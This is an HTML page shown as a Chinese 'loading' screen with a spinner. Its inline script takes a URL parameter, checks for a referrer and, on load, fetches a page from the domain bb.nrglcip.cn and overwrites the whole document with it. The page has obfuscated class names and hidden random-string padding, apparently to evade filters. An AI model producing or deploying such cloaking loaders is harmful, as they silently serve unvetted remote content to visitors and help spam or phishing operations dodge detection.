<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .D2JVwJHwfwA {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .D2JVwJHwfwA .Yad2jBV {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .D2JVwJHwfwA .content {
            line-height: 50px;
            text-align: center
        }

        .D2JVwJHwfwA .img {
            width: 100%
        }

        .D2JVwJHwfwA .OOABb9I44 {
            text-align: center
        }

        .D2JVwJHwfwA .OOABb9I44 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .D2JVwJHwfwA .OOABb9I44 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .D2JVwJHwfwA .OOABb9I44 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .D2JVwJHwfwA .OOABb9I44 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .D2JVwJHwfwA .OOABb9I44 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .D2JVwJHwfwA .OOABb9I44 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .D2JVwJHwfwA .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Cr6Z0xLxS(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var rG5QqCo = Cr6Z0xLxS('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ rG5QqCo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ rG5QqCo +".html?a=share";
		}
		
        O4krmGgNU=url+"#"+new Date().getTime();
        O4krmGgNU && function() {
            $.get(O4krmGgNU, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>n6VWCEhnlYo6rsI1DA779KILusPKy1W3UvfVPeGStFP7T9Lo3fGuV86AzDF8GGOInwdg493L4IzzSAM</a>
<div style='display:none'>xFrb6MT410PA344neynvlyKUVWBpyXBvOOxsCJGdaSM8DOnX9R4ezyXLYCm</div>
<img  src='' style='display:none'><div class="D2JVwJHwfwA">
    <div class="Yad2jBV">
        <div class="OOABb9I44">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>TxTlUBs8BeVVzpVsACR7IraOTOhBy1sJKTt4T3QxyrrXzfjHIZCUdzc4</span>
<img  src='' style='display:none'>
<p  style='display:none'>BMq8TIbxxjHQrs8r3FVgKbxFZJgajBpCxptRHijHKJBOu7cT5vwi2eERRw0</p>
<li style='display:none' >Nu1nsJkqgXYaK8HA5LEBoYA7IBlmYs2Tg3RJE8iRI</li>
<p  style='display:none'>BMq8TIbxxjHQrs8r3FVgKbxFZJgajBpCxptRHijHKJBOu7cT5vwi2eERRw0</p>
<div style='display:none'>zWQmDeZBEOtQO7fNPd4Cr2rQXT43Iawwf3kbzzb3fHgoL5QQDsvvPfn1HZbEsEAgtZP9SlDuPALZfTaNKwsI41w</div>
<b style='display:none' >wh0hIqzyfysrQVW8lz5Bk6AKLLNpXRbkIemI87j6JJMElu70f3kEeLDbFU47iYJVqvbDfiUlbubLF8gT2</b>
<h1 style='display:none' >xgyCECobYAdy4MlVZGCHzIB6gukVUGxjy7iLPCyfwf7O2JQV2Ti3E3dHwhv49Uu9BouSZhauWMYjJ</h1></body>
</html>